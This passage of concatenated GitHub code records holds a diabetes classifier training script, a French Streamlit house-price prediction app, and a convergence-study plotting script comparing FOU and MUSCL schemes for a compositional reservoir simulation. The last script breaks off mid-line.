columns=feature_names)\n\nmodel = RandomForestClassifier(n_estimators=100, criterion='gini')\nmodel.fit(x_train_df, y_train)\n\ny_pred = model.predict(x_test_df)\n# print(y_pred)\naccuracy = model.score(x_test_df, y_test)\nprint(\"Accuracy:\", accuracy)\npatient = [1.0, 57.0, 0.0, 0.0, 3.0, 57.1, 6.5, 126.0]\npatient_df = pd.DataFrame([patient], columns=feature_names)\nprediction = model.predict(patient_df)\nif prediction == 0:\n print(\"Diabetes test result is negative\")\nelse:\n print(\"Diabetes test result is positive\")\n","repo_name":"farzanasumona/diabetes-predictor-machine-learning-project","sub_path":"MLmodel/train_model.py","file_name":"train_model.py","file_ext":"py","file_size_in_byte":1690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"42688737750","text":"import streamlit as st \nimport numpy as np \nimport pandas as pd \nimport pickle \nfrom PIL import Image\n\npd.options.display.max_columns = 150 \n\n\nst.title(\"Prediction de prix d'une maison\")\n\n\nsqft_living = st.number_input('Surface en squarefeet', value = 300, key ='sqft_living')\nst.write('La surface est de', sqft_living, \"squarefeet\")\n\n\nbedrooms = st.number_input('Nombre de chambres', value = 1, key = 'bedrooms')\nst.write('Il y a', bedrooms, \"chambres\")\n\n\nbathrooms = st.number_input('Nombre de salle de bains', value = 1, key = 'bathrooms')\nst.write('Il y a', bathrooms, \"salle de bains\")\n\n\nsqft_lot = st.slider(\"Surface du jardin\" , 0, 2200000, 500, key = 'sqft_lot')\nst.write(\"La surface du jardin est de \" , sqft_lot)\n\n\n\nfloors = st.number_input(\"Nombre d'étage\", value = 1, key = 'floors')\nst.write('Il y a', floors, 'étage(s)' )\n\n\nwaterfront = st.radio(\"Possede t-elle une vue sur la mer?\" , ('Oui', 'Non'), key = 'waterfront' ) \n\nif waterfront == 'Yes': \n waterfront = 1\nelse: \n waterfront = 0\n \n\nview = st.slider('Notez la vue de 0 à 4', 0, 4, 2, key = 'view')\nst.write(\"La vue est de\" , view , \"sur 4.\")\n\n\ncondition = st.slider(\"Notez l'état de l'appartement de 1 à 5\" , 1, 5, 3, key = 'condition')\nst.write(\"L'état est de\" , condition , \"sur 5.\")\n\n\ngrade = st.slider(\n\"Un indice de 1 à 13, où 1-3 est un niveau faible de construction, de design et de la conception des bâtiments, et 11-13 ont un niveau de qualité élevé \", 1, 13, 6, key = 'grade')\nst.write(\"Le grade est de\" , grade , \"sur 13.\")\n\n\nsqft_above = st.slider(\"Superficie en squarefeet de la surface qui se situe au rez-de-chaussée ainsi que dans les étages\" , 0, 22000, 100, key = 'sqft_above')\nst.write('Cette surface est de', sqft_above)\n\n\nsqft_basement = st.slider('Superficie en squarefeet de la surface qui se situe en dessous du rez-de-chaussée', 0, 22000, 100 , key = 'sqft_basement')\nst.write('Cette surface est de', sqft_basement)\n\n\nyr_built = st.slider('Année de construction', 1900, 2022, 2000, key = 'yr_built')\nst.write('Le bien a été construit en', yr_built )\n\n\nyr_renovated = st.slider(\"Année de rénovation, indiquez 0 si il n'y a jamais eu de rénovation \", 0, 2022, 0, key = 'yr_renovated')\nst.write('Le bien a été rénové en', yr_renovated )\n\n\n\n\nzipcode = st.selectbox(\n 'Quel est le code postal?',\n 
(\n\"98001\",\n\"98002\",\n\"98003\",\n\"98004\",\n\"98005\",\n\"98006\",\n\"98007\",\n\"98008\",\n\"98009\",\n\"98010\",\n\"98011\",\n\"98013\",\n\"98014\",\n\"98015\",\n\"98019\",\n\"98022\",\n\"98023\",\n\"98024\",\n\"98025\",\n\"98027\",\n\"98028\",\n\"98029\",\n\"98030\",\n\"98031\",\n\"98032\",\n\"98033\",\n\"98034\",\n\"98035\",\n\"98038\",\n\"98039\",\n\"98040\",\n\"98041\",\n\"98042\",\n\"98045\",\n\"98047\",\n\"98050\",\n\"98051\",\n\"98052\",\n\"98053\",\n\"98055\",\n\"98056\",\n\"98057\",\n\"98058\",\n\"98059\",\n\"98062\",\n\"98063\",\n\"98064\",\n\"98065\",\n\"98070\",\n\"98071\",\n\"98072\",\n\"98073\",\n\"98074\",\n\"98075\",\n\"98077\",\n\"98083\",\n\"98089\",\n\"98092\",\n\"98093\",\n\"98101\",\n\"98102\",\n\"98103\",\n\"98104\",\n\"98105\",\n\"98106\",\n\"98107\",\n\"98108\",\n\"98109\",\n\"98111\",\n\"98112\",\n\"98113\",\n\"98114\",\n\"98115\",\n\"98116\",\n\"98117\",\n\"98118\",\n\"98119\",\n\"98121\",\n\"98122\",\n\"98124\",\n\"98125\",\n\"98126\",\n\"98127\",\n\"98129\",\n\"98131\",\n\"98133\",\n\"98134\",\n\"98136\",\n\"98138\",\n\"98139\",\n\"98141\",\n\"98144\",\n\"98145\",\n\"98146\",\n\"98148\",\n\"98154\",\n\"98155\",\n\"98158\",\n\"98160\",\n\"98161\",\n\"98164\",\n\"98165\",\n\"98166\",\n\"98168\",\n\"98170\",\n\"98174\",\n\"98175\",\n\"98177\",\n\"98178\",\n\"98181\",\n\"98185\",\n\"98188\",\n\"98190\",\n\"98191\",\n\"98194\",\n\"98195\",\n\"98198\",\n\"98199\",\n\"98224\",\n\"98288\"), key = 'zipcode')\nst.write('Le code postal est ', zipcode)\n\n\n\n\n\nlat = st.number_input(\"Entrez la latitude du bien\", value = 47, key = 'lat')\nst.write('lat:', lat) \n\nlong = st.number_input(\"Entrez la longitude du bien\", value = -122, key = 'long')\nst.write('long:', long) \n\n\nyear = st.slider('Année de mise en vente', 2022, 2026, 2022, key = 'year')\n\nmonth = st.slider('Mois de mise en vente', 1, 12, 6, key = 'month')\n\n\n\ndata = {\n 'sqft_living':sqft_living,\n 'bedrooms': bedrooms,\n 'bathrooms':bathrooms,\n 'sqft_lot':sqft_lot,\n 'floors':floors,\n 'waterfront':waterfront,\n 'view':view,\n 'condition':condition,\n 'grade':grade,\n 'sqft_above':sqft_above,\n 'sqft_basement':sqft_basement,\n 'yr_built':yr_built,\n 'yr_renovated':yr_renovated,\n 'zipcode':zipcode,\n 'lat':lat,\n 'long':long,\n 'year':year,\n 'month':month\n}\n\nparametres = pd.DataFrame(data, index=[0])\n\n\nX = pd.read_csv(\"df_cleaned.csv\")\ny = pd.read_csv(\"df_modelisation_price.csv\")\n\n\n\nparametres['zipcode'] = parametres['zipcode'].astype(str)\nparametres['month'] = parametres['month'].astype(str)\n\npickle_in = open('my_pipe_lr.pkl', 'rb') \nmy_pipe_lr = pickle.load(pickle_in)\n\n\n\nif st.button('Estimez le prix de votre bien'):\n print(parametres.info())\n print(\"-----------------\")\n print(data)\n prediction = my_pipe_lr.predict(parametres)\n\n prix = round(prediction[0][0],2)\n st.write('# Le prix du bien immobilier est:', prix, \"$\")\n \n# Image\nimg = Image.open(\"maison.jpg\")\nst.image(img, width=700, caption='House in king county')","repo_name":"yaniskahoul/prediction_prix_maison","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4992,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"36524785597","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.lines import Line2D\nimport os\nimport math\nfrom scipy.interpolate import interp1d\nfrom scipy.interpolate import InterpolatedUnivariateSpline, UnivariateSpline\n\nflying = 'flying'\nname = 'results'\narquivos = os.listdir(flying)\n\nfor arq in arquivos:\n if arq.startswith(name):\n\n x_MOC = np.array([0, 0.0615711, 0.121019, 0.181529, 0.214437, 0.214968, \\\n 0.396497, 0.544586, 0.725584, 0.726115, 0.835987, 0.835987, 1.0552, \\\n 1.05573, 1.09395, 1.09395, 1.5])\n Sg_MOC = np.array([1, 1, 1, 1, 1, 0.947941, 0.947941, 0.947941, 0.947552, \\\n 0.877622, 0.877622, 0.772727, 0.734266, 0.563326, 0.563326, 0, 0])\n\n x_zC1_MOC = np.array([1, 1.0427, 1.04483, 1.04583, 1.04724, 1.04793, \\\n 1.04878, 1.05016, 1.05194, 1.05326, 1.0547, 1.05611, 1.05808, 1.06021, \\\n 1.06231, 1.06432, 1.06642, 1.06767, 1.0698, 1.07206, 1.07415, 1.07572, \\\n 1.07823, 1.08064, 1.08596, 1.0927, 1.09305, 1.09323, 1.09342, 1.09348, \\\n 1.09364, 1.09389, 1.09417, 1.09455, 1.09499, 1.09574, 1.09668, 1.09828, \\\n 1.09975, 1.10636, 1.12607, 1.13434, 1.14223, 1.14981])\n\n zC1_MOC = np.array([0, 2.978236e-4, 0.00476518, 0.00863688, 0.0178694, \\\n 0.0254639, 0.0379725, 0.070882, 0.133276, 0.20252, 0.282635, 0.353666, \\\n 0.43795, 0.506598, 0.551271, 0.57614, 0.593265, 0.600561, 0.608007, \\\n 0.612772, 0.615006, 0.616495, 0.617239, 0.617984, 0.617835, 0.617835, \\\n 0.612176, 0.60622, 0.593414, 0.561249, 0.502726, 0.384341, 0.297973, \\\n 0.285762, 0.275934, 0.264765, 0.257617, 0.251959, 0.250767, 0.249725, \\\n 0.249576, 0.249725, 0.249576, 0.250023])\n\n x_zC1_LLF = np.array([1.0021, 1.00968, 1.01732, 1.02494, 1.03258, 1.04016, \\\n 1.04759, 1.0552, 1.06288, 1.07021, 1.07794, 1.08515, 1.0933, 1.1005, \\\n 1.10824, 1.1157, 1.1234, 1.13105, 1.1386, 1.1459, 1.14972])\n zC1_LLF = np.array([0.0820504, 0.0972394, 0.114513, 0.133276, 0.152188, \\\n 0.172589, 0.193436, 0.215178, 0.237216, 0.258809, 0.280699, 0.301546, \\\n 0.322841, 0.333414, 0.310779, 0.249725, 0.216667, 0.222325, 0.22858, \\\n 0.233196, 0.234536])\n\n x_zC1_DW = np.array([1.00244, 1.00987, 1.01745, 1.025, 1.03261, 1.03997, \\\n 1.04774, 1.05523, 1.06275, 1.07046, 1.07804, 1.08543, 1.09295, 1.10063, \\\n 1.10827, 1.11275, 1.11563, 1.1234, 1.13073, 1.13847, 1.1459])\n zC1_DW = np.array([0.0479496, 0.0635853, 0.0817526, 0.103047, 0.129107, \\\n 0.158442, 0.188969, 0.223517, 0.259107, 0.295441, 0.33118, 0.366472, \\\n 0.397892, 0.39819, 0.304078, 0.268041, 0.241535, 0.241237, 0.241833, \\\n 0.241535, 0.243918])\n\n x_zC1_MDW = np.array([1.00244, 1.00987, 1.01745, 1.025, 1.03261, 1.03997, \\\n 1.04774, 1.05523, 1.06275, 1.07046, 1.07804, 1.08543, 1.09314, 1.10063, \\\n 1.10661, 1.10946, 1.11291, 1.11626, 1.12356, 1.13083, 1.13838])\n zC1_MDW = np.array([0.0479496, 0.0635853, 0.0817526, 0.103047, 0.129107, \\\n 0.158442, 0.188969, 0.223517, 0.259107, 0.295441, 0.33118, 0.366472, \\\n 0.39134, 0.379129, 0.335052, 0.303036, 0.271317, 0.237068, 0.237365, \\\n 0.238706, 0.241535])\n\n x_zC1_ROE = np.array([1.00244, 1.00987, 1.01745, 1.025, 1.03261, 1.03997, \\\n 1.04774, 1.05523, 1.06275, 1.07046, 1.07804, 1.08543, 1.09314, 1.10066, \\\n 1.10815, 1.11579, 1.12343, 1.13086, 1.13844, 1.14599])\n zC1_ROE = np.array([0.0479496, 0.0635853, 0.0817526, 0.103047, 0.129107, \\\n 0.158442, 0.188969, 0.223517, 0.259107, 0.295441, 0.33118, 0.366472, \\\n 0.397892, 0.419038, 0.347858, 0.235876, 0.237663, 0.238855, 0.240641, \\\n 0.242279])\n\n f = interp1d(x_MOC,Sg_MOC)\n\n 
\"\"\"---------------------- Convergence Study -------------------------\"\"\"\n\n datas = np.load('flying/results_case1_Moshiri_Manzari_5k_4000_FOU_8726.npy', allow_pickle=True)\n for data in datas[datas.shape[0]-1:]:\n So_FOU_4000 = data[6]\n Sg_FOU_4000 = data[7]\n zCO2_FOU_4000 = data[10][0]\n x_4000 = np.linspace(0,1.5,4000)\n f = interp1d(x_4000,zCO2_FOU_4000)\n\n \"\"\"----------------------------- FOU --------------------------------\"\"\"\n\n datas = np.load('flying/results_case1_Moshiri_Manzari_5k_8_FOU_37.npy', allow_pickle=True)\n for data in datas[datas.shape[0]-1:]:\n So_FOU_8 = data[6]\n Sg_FOU_8 = data[7]\n zC1_FOU_8 = data[10][1]\n zCO2_FOU_8 = data[10][0]\n xkj_FOU_8 = data[13]\n\n xkj_FOU_8[:,1,Sg_FOU_8==0] = 0\n xkj_FOU_8[:,0,So_FOU_8==0] = 0\n x_8 = np.linspace(0,1.5,len(So_FOU_8))\n n = 8\n e8_L1_FOU = (sum(abs(f(x_8)- data[10][0]))*(1/n))\n t8_FOU = data[2]\n\n datas = np.load('flying/results_case1_Moshiri_Manzari_5k_16_FOU_36.npy', allow_pickle=True)\n for data in datas[datas.shape[0]-1:]:\n So_FOU_16 = data[6]\n Sg_FOU_16 = data[7]\n zC1_FOU_16 = data[10][1]\n zCO2_FOU_16 = data[10][0]\n xkj_FOU_16 = data[13]\n\n xkj_FOU_16[:,1,Sg_FOU_16==0] = 0\n xkj_FOU_16[:,0,So_FOU_16==0] = 0\n x_16 = np.linspace(0,1.5,len(So_FOU_16))\n n = 16\n e16_L1_FOU = (sum(abs(f(x_16)-data[10][0]))*(1/n))\n R16_L1_FOU = math.log(e8_L1_FOU/e16_L1_FOU,2)\n t16_FOU = data[2]\n\n datas = np.load('flying/results_case1_Moshiri_Manzari_5k_32_FOU_118.npy', allow_pickle=True)\n for data in datas[datas.shape[0]-1:]:\n So_FOU_32 = data[6]\n Sg_FOU_32 = data[7]\n zC1_FOU_32 = data[10][1]\n zCO2_FOU_32 = data[10][0]\n xkj_FOU_32 = data[13]\n\n xkj_FOU_32[:,1,Sg_FOU_32==0] = 0\n xkj_FOU_32[:,0,So_FOU_32==0] = 0\n x_32 = np.linspace(0,1.5,len(So_FOU_32))\n n = 32\n e32_L1_FOU = (sum(abs(f(x_32)-data[10][0]))*(1/n))\n R32_L1_FOU = math.log(e16_L1_FOU/e32_L1_FOU,2)\n e32_L2_FOU = np.sqrt(np.sum((f(x_32)-data[10][0])**2) * 1 / n)\n\n t32_FOU = data[2]\n\n datas = np.load('flying/results_case1_Moshiri_Manzari_5k_64_FOU_142.npy', allow_pickle=True)\n for data in datas[datas.shape[0]-1:]:\n So_FOU_64 = data[6]\n Sg_FOU_64 = data[7]\n zC1_FOU_64 = data[10][1]\n zCO2_FOU_64 = data[10][0]\n xkj_FOU_64 = data[13]\n\n xkj_FOU_64[:,1,Sg_FOU_64==0] = 0\n xkj_FOU_64[:,0,So_FOU_64==0] = 0\n x_64 = np.linspace(0,1.5,len(So_FOU_64))\n n = 64\n e64_L1_FOU = (sum(abs(f(x_64)-data[10][0]))*(1/n))\n R64_L1_FOU = math.log(e32_L1_FOU/e64_L1_FOU,2)\n e64_L2_FOU = np.sqrt(np.sum((f(x_64)-data[10][0])**2) * 1 / n)\n\n t64_FOU = data[2]\n\n datas = np.load('flying/results_case1_Moshiri_Manzari_5k_128_FOU_284.npy', allow_pickle=True)\n for data in datas[datas.shape[0]-1:]:\n So_FOU_128 = data[6]\n Sg_FOU_128 = data[7]\n zC1_FOU_128 = data[10][1]\n zCO2_FOU_128 = data[10][0]\n xkj_FOU_128 = data[13]\n\n xkj_FOU_128[:,1,Sg_FOU_128==0] = 0\n xkj_FOU_128[:,0,So_FOU_128==0] = 0\n x_128 = np.linspace(0,1.5,len(So_FOU_128))\n n = 128\n e128_L1_FOU = (sum(abs(f(x_128)-data[10][0]))*(1/n))\n R128_L1_FOU = math.log(e64_L1_FOU/e128_L1_FOU,2)\n e128_L2_FOU = np.sqrt(np.sum((f(x_128)-data[10][0])**2) * 1 / n)\n\n t128_FOU = data[2]\n\n datas = np.load('flying/results_case1_Moshiri_Manzari_5k_200_FOU_1125.npy', allow_pickle=True)\n for data in datas[datas.shape[0]-1:]:\n So_FOU_200 = data[6]\n Sg_FOU_200 = data[7]\n zC1_FOU_200 = data[10][1]\n xkj_FOU_200 = data[13]\n\n xkj_FOU_200[:,1,Sg_FOU_200==0] = 0\n xkj_FOU_200[:,0,So_FOU_200==0] = 0\n x_200 = np.linspace(0,1.5,len(So_FOU_200))\n\n\n datas = 
np.load('flying/results_case1_Moshiri_Manzari_5k_256_FOU_579.npy', allow_pickle=True)\n #datas = np.load('flying/results_case1_Moshiri_Manzari_5k_256_FOU_t_404.npy', allow_pickle=True)\n for data in datas[datas.shape[0]-1:]:\n So_FOU_256 = data[6]\n Sg_FOU_256 = data[7]\n zC1_FOU_256 = data[10][1]\n zCO2_FOU_256 = data[10][0]\n xkj_FOU_256 = data[13]\n\n xkj_FOU_256[:,1,Sg_FOU_256==0] = 0\n xkj_FOU_256[:,0,So_FOU_256==0] = 0\n x_256 = np.linspace(0,1.5,len(So_FOU_256))\n n = 256\n e256_L1_FOU = (sum(abs(f(x_256)-data[10][0]))*(1/n))\n R256_L1_FOU = math.log(e128_L1_FOU/e256_L1_FOU,2)\n e256_L2_FOU = np.sqrt(np.sum((f(x_256)-data[10][0])**2) * 1 / n)\n\n t256_FOU = data[2]\n\n datas = np.load('flying/results_case1_Moshiri_Manzari_5k_512_FOU_976.npy', allow_pickle=True)\n for data in datas[datas.shape[0]-1:]:\n So_FOU_512 = data[6]\n Sg_FOU_512 = data[7]\n zC1_FOU_512 = data[10][1]\n zCO2_FOU_512 = data[10][0]\n xkj_FOU_512 = data[13]\n\n xkj_FOU_512[:,1,Sg_FOU_512==0] = 0\n xkj_FOU_512[:,0,So_FOU_512==0] = 0\n x_512 = np.linspace(0,1.5,len(So_FOU_512))\n n = 512\n e512_L1_FOU = (sum(abs(f(x_512)-data[10][0]))*(1/n))\n R512_L1_FOU = math.log(e256_L1_FOU/e512_L1_FOU,2)\n e512_L2_FOU = np.sqrt(np.sum((f(x_512)-data[10][0])**2) * 1 / n)\n\n t512_FOU = data[2]\n\n datas = np.load('flying/results_case1_Moshiri_Manzari_5k_1024_FOU_2288.npy', allow_pickle=True)\n for data in datas[datas.shape[0]-1:]:\n So_FOU_1024 = data[6]\n Sg_FOU_1024 = data[7]\n zC1_FOU_1024 = data[10][1]\n zCO2_FOU_1024 = data[10][0]\n\n x_1024 = np.linspace(0,1.5,len(So_FOU_1024))\n n = 1024\n e1024_L1_FOU = (sum(abs(f(x_1024)-data[10][0]))*(1/n))\n R1024_L1_FOU = math.log(e512_L1_FOU/e1024_L1_FOU,2)\n e1024_L2_FOU = np.sqrt(np.sum((f(x_1024)-data[10][0])**2) * 1 / n)\n\n t1024_FOU = data[2]\n\n datas = np.load('flying/results_case1_Moshiri_Manzari_5k_2048_FOU_5139.npy', allow_pickle=True)\n for data in datas[datas.shape[0]-1:]:\n So_FOU_2048 = data[6]\n Sg_FOU_2048 = data[7]\n zC1_FOU_2048 = data[10][1]\n zCO2_FOU_2048 = data[10][0]\n\n x_2048 = np.linspace(0,1.5,len(So_FOU_2048))\n n = 2048\n e2048_L1_FOU = (sum(abs(f(x_2048)-data[10][0]))*(1/n))\n e2048_L2_FOU = np.sqrt(np.sum((f(x_2048)-data[10][0])**2) * 1 / n)\n\n R2048_L1_FOU = math.log(e1024_L1_FOU/e2048_L1_FOU,2)\n t2048_FOU = data[2]\n\n \"\"\"----------------------------- MUSCL --------------------------------\"\"\"\n\n datas = np.load('flying/results_case1_Moshiri_Manzari_5k_8_MUSCL_LLF_89.npy', allow_pickle=True)\n for data in datas[datas.shape[0]-1:]:\n Sg_MUSCL_8 = data[7]\n zC1_MUSCL_8 = data[10][1]\n zCO2_MUSCL_8 = data[10][0]\n n = 8\n e8_L1_MUSCL = (sum(abs(f(x_8)-data[10][0]))*(1/n))\n t8_MUSCL = data[2]\n\n datas = np.load('flying/results_case1_Moshiri_Manzari_5k_16_MUSCL_108.npy', allow_pickle=True)\n for data in datas[datas.shape[0]-1:]:\n Sg_MUSCL_16 = data[7]\n zC1_MUSCL_16 = data[10][1]\n n = 16\n e16_L1_MUSCL = (sum(abs(f(x_16)-data[10][0]))*(1/n))\n R16_L1_MUSCL = math.log(e8_L1_MUSCL/e16_L1_MUSCL,2)\n t16_MUSCL = data[2]\n\n #datas = np.load('flying/results_case1_Moshiri_Manzari_5k_32_MUSCL_149.npy', allow_pickle=True)\n datas = np.load('flying/results_case1_Moshiri_Manzari_5k_32_MUSCL_MDW_197.npy', allow_pickle=True)\n for data in datas[datas.shape[0]-1:]:\n Sg_MUSCL_32 = data[7]\n zC1_MUSCL_32 = data[10][1]\n zCO2_MUSCL_32 = data[10][0]\n n = 32\n e32_L1_MUSCL = (sum(abs(f(x_32)-data[10][0]))*(1/n))\n R32_L1_MUSCL = math.log(e16_L1_MUSCL/e32_L1_MUSCL,2)\n e32_L2_MUSCL = np.sqrt(np.sum((f(x_32)-data[10][0])**2) * 1 / n)\n\n t32_MUSCL = 
data[2]\n\n #datas = np.load('flying/results_case1_Moshiri_Manzari_5k_64_MUSCL_352.npy', allow_pickle=True)\n datas = np.load('flying/results_case1_Moshiri_Manzari_5k_64_MUSCL_MDW_438.npy', allow_pickle=True)\n for data in datas[datas.shape[0]-1:]:\n Sg_MUSCL_64 = data[7]\n zC1_MUSCL_64 = data[10][1]\n zCO2_MUSCL_64 = data[10][0]\n n = 64\n e64_L1_MUSCL = (sum(abs(f(x_64)-data[10][0]))*(1/n))\n R64_L1_MUSCL = math.log(e32_L1_MUSCL/e64_L1_MUSCL,2)\n e64_L2_MUSCL = np.sqrt(np.sum((f(x_64)-data[10][0])**2) * 1 / n)\n\n t64_MUSCL = data[2]\n\n #datas = np.load('flying/results_case1_Moshiri_Manzari_5k_128_MUSCL_LLF_994.npy', allow_pickle=True)\n datas = np.load('flying/results_case1_Moshiri_Manzari_5k_128_MUSCL_MDW_922.npy', allow_pickle=True)\n for data in datas[datas.shape[0]-1:]:\n Sg_MUSCL_128 = data[7]\n zC1_MUSCL_128 = data[10][1]\n zCO2_MUSCL_128 = data[10][0]\n n = 128\n e128_L1_MUSCL = (sum(abs(f(x_128)-data[10][0]))*(1/n))\n R128_L1_MUSCL = math.log(e64_L1_MUSCL/e128_L1_MUSCL,2)\n e128_L2_MUSCL = np.sqrt(np.sum((f(x_128)-data[10][0])**2) * 1 / n)\n\n t128_MUSCL = data[2]\n\n datas = np.load('flying/results_case1_Moshiri_Manzari_5k_200_MUSCL_LLF_t_1609.npy', allow_pickle=True)\n for data in datas[datas.shape[0]-1:]:\n So_MUSCL_200 = data[6]\n Sg_MUSCL_200 = data[7]\n z_MUSCL_200 = data[10]\n xkj_MUSCL_200 = data[13]\n\n xkj_MUSCL_200[:,1,Sg_MUSCL_200==0] = 0\n xkj_MUSCL_200[:,0,So_MUSCL_200==0] = 0\n t_MUSCL_200 = data[2]\n\n #datas = np.load('flying/results_case1_Moshiri_Manzari_5k_256_MUSCL_LLF_t_2044.npy', allow_pickle=True)\n datas = np.load('flying/results_case1_Moshiri_Manzari_5k_256_MUSCL_MDW_1832.npy', allow_pickle=True)\n #datas = np.load('flying/results_case1_Moshiri_Manzari_5k_256_MUSCL_LLF_t_1434.npy', allow_pickle=True)\n for data in datas[datas.shape[0]-1:]:\n Sg_MUSCL_256 = data[7]\n zC1_MUSCL_256 = data[10][1]\n zCO2_MUSCL_256 = data[10][0]\n n = 256\n e256_L1_MUSCL = (sum(abs(f(x_256)-data[10][0]))*(1/n))\n e256_L2_MUSCL = np.sqrt(np.sum((f(x_256)-data[10][0])**2) * 1 / n)\n R256_L1_MUSCL = math.log(e128_L1_MUSCL/e256_L1_MUSCL,2)\n t256_MUSCL = data[2]\n\n #datas = np.load('flying/results_case1_Moshiri_Manzari_5k_512_MUSCL_LLF_9198.npy', allow_pickle=True)\n #datas = np.load('flying/results_case1_Moshiri_Manzari_5k_512_MUSCL_LLF_4260.npy', allow_pickle=True)\n datas = np.load('flying/results_case1_Moshiri_Manzari_5k_512_MUSCL_MDW_3662.npy', allow_pickle=True)\n for data in datas[datas.shape[0]-1:]:\n Sg_MUSCL_512 = data[7]\n zC1_MUSCL_512 = data[10][1]\n zCO2_MUSCL_512 = data[10][0]\n n = 512\n e512_L2_MUSCL = np.sqrt(np.sum((f(x_512)-data[10][0])**2) * 1 / n)\n e512_L1_MUSCL = (sum(abs(f(x_512)-data[10][0]))*(1/n))\n R512_L1_MUSCL = math.log(e256_L1_MUSCL/e512_L1_MUSCL,2)\n t512_MUSCL = data[2]\n\n datas = np.load('flying/results_case1_Moshiri_Manzari_5k_1024_MUSCL_7654.npy', allow_pickle=True)\n for data in datas[datas.shape[0]-1:]:\n Sg_MUSCL_1024 = data[7]\n zC1_MUSCL_1024 = data[10][1]\n zCO2_MUSCL_1024 = data[10][0]\n n = 1024\n x_1024 = np.linspace(0, 1.5, 1024)\n e1024_L1_MUSCL = (sum(abs(f(x_1024)-data[10][0]))*(1/n))\n R1024_L1_MUSCL = math.log(e512_L1_MUSCL/e1024_L1_MUSCL,2)\n t1024_MUSCL = data[2]\n\n '''datas = np.load('flying/results_case1_Moshiri_Manzari_5k_2048_LLF_7654.npy', allow_pickle=True)\n for data in datas[datas.shape[0]-1:]:\n Sg_MUSCL_2048 = data[7]\n zC1_MUSCL_2048 = data[10][1]\n zCO2_MUSCL_2048 = data[10][0]\n n = 2048\n e2048_L1_MUSCL = (sum(abs(f(x_2048)-data[10][0]))*(1/n))\n #R2048_L1_MUSCL = math.log(e512_L1_MUSCL/e2048_L1_MUSCL,2)\n 
t2048_MUSCL = data[2]'''\n\n size = 5\n plt.figure(1)\n plt.plot(x_MOC, Sg_MOC, 'k')\n #plt.plot(x_8, Sg_MUSCL_8, '-r', mfc='none')\n #plt.plot(x_16, Sg_MUSCL_16, '-y', mfc='none')\n plt.plot(x_32, Sg_MUSCL_32, '-go', mfc='none', markersize=size)\n plt.plot(x_64, Sg_MUSCL_64, '-bp', mfc='none', markersize=size)\n plt.plot(x_128, Sg_MUSCL_128, '-mD', mfc='none', markersize=size)\n #plt.plot(x_200, Sg_MUSCL_200, 'y', mfc='none', markersize=size)\n plt.plot(x_256, Sg_MUSCL_256, '-cs', mfc='none', markersize=size)\n #plt.plot(x_512, Sg_MUSCL_512, '-rv', mfc='none', markersize=size)\n #plt.plot(x_1024, Sg_MUSCL_1024, '-y')\n plt.legend(('MOC', 'MUSCL-32', 'MUSCL-64', \\\n 'MUSCL-128', 'MUSCL-256'))\n plt.grid()\n plt.ylabel('Sg')\n plt.xlabel('Distância')\n plt.savefig('results/compositional/TCC2/5k_Sg_MUSCL.png')\n\n plt.figure(2)\n plt.plot(x_MOC, Sg_MOC, 'k')\n #plt.plot(x_8, Sg_FOU_8, '-r', mfc='none')\n #plt.plot(x_16, Sg_FOU_16, '-y', mfc='none')\n plt.plot(x_32, Sg_FOU_32, '-go', mfc='none', markersize=size)\n plt.plot(x_64, Sg_FOU_64, '-bp', mfc='none', markersize=size)\n plt.plot(x_128, Sg_FOU_128, '-mD', mfc='none', markersize=size)\n plt.plot(x_256, Sg_FOU_256, '-cs', mfc='none', markersize=size)\n #plt.plot(x_512, Sg_FOU_512, '-rv', mfc='none', markersize=size)\n plt.legend(('MOC', 'FOU-32', 'FOU-64', \\\n 'FOU-128', 'FOU-256'))\n plt.grid()\n plt.ylabel('Sg')\n plt.xlabel('Distância')\n plt.savefig('results/compositional/TCC2/5k_Sg_FOU.png')\n\n plt.figure(3)\n plt.plot(x_MOC, Sg_MOC, 'k')\n #plt.plot(x_8, Sg_MUSCL_8, '-r', mfc='none')\n #plt.plot(x_16, Sg_MUSCL_16, '-y', mfc='none')\n plt.plot(x_32, Sg_MUSCL_32, '-go', mfc='none', markersize=size)\n plt.plot(x_64, Sg_MUSCL_64, '-bp', mfc='none', markersize=size)\n plt.plot(x_128, Sg_MUSCL_128, '-mD', mfc='none', markersize=size)\n #plt.plot(x_200, Sg_MUSCL_200, 'ys', mfc='none', markersize=size)\n plt.plot(x_256, Sg_MUSCL_256, '-c<', mfc='none', markersize=size)\n #plt.plot(x_512, Sg_MUSCL_512, '-r*', mfc='none', markersize=6)\n plt.legend(('MOC', 'MUSCL-32', 'MUSCL-64', \\\n 'MUSCL-128', 'MUSCL-256'))\n plt.grid()\n plt.xlim((0.5, 1.2))\n plt.ylim((0.4, 1))\n plt.ylabel('Sg')\n plt.xlabel('Distância')\n plt.savefig('results/compositional/TCC2/5k_Sg_MUSCL_zoom.png')\n\n plt.figure(4)\n plt.plot(x_MOC, Sg_MOC, 'k')\n #plt.plot(x_8, Sg_FOU_8, '-r', mfc='none')\n #plt.plot(x_16, Sg_FOU_16, '-y', mfc='none')\n plt.plot(x_32, Sg_FOU_32, '-go', mfc='none', markersize=size)\n plt.plot(x_64, Sg_FOU_64, '-bp', mfc='none', markersize=size)\n plt.plot(x_128, Sg_FOU_128, '-mD', mfc='none', markersize=size)\n plt.plot(x_256, Sg_FOU_256, '-cs', mfc='none', markersize=size)\n #plt.plot(x_512, Sg_FOU_512, '-rv', mfc='none', markersize=size)\n plt.legend(('MOC', 'FOU-32', 'FOU-64', \\\n 'FOU-128', 'FOU-256'))\n plt.grid()\n plt.xlim((0.5, 1.2))\n plt.ylim((0.4, 1))\n plt.ylabel('Sg')\n plt.xlabel('Distância')\n plt.savefig('results/compositional/TCC2/5k_Sg_FOU_zoom.png')\n\n plt.figure(5)\n plt.plot(x_zC1_MOC, zC1_MOC, 'k')\n #plt.plot(x_8, Sg_MUSCL_8, '-r', mfc='none')\n #plt.plot(x_16, Sg_MUSCL_16, '-y', mfc='none')\n plt.plot(x_32, zC1_MUSCL_32, '-go', mfc='none', markersize=size)\n plt.plot(x_64, zC1_MUSCL_64, '-bp', mfc='none', markersize=size)\n plt.plot(x_128, zC1_MUSCL_128, '-mD', mfc='none', markersize=size)\n plt.plot(x_256, zC1_MUSCL_256, '-cs', mfc='none', markersize=size)\n plt.plot(x_512, zC1_MUSCL_512, '-rv', mfc='none', 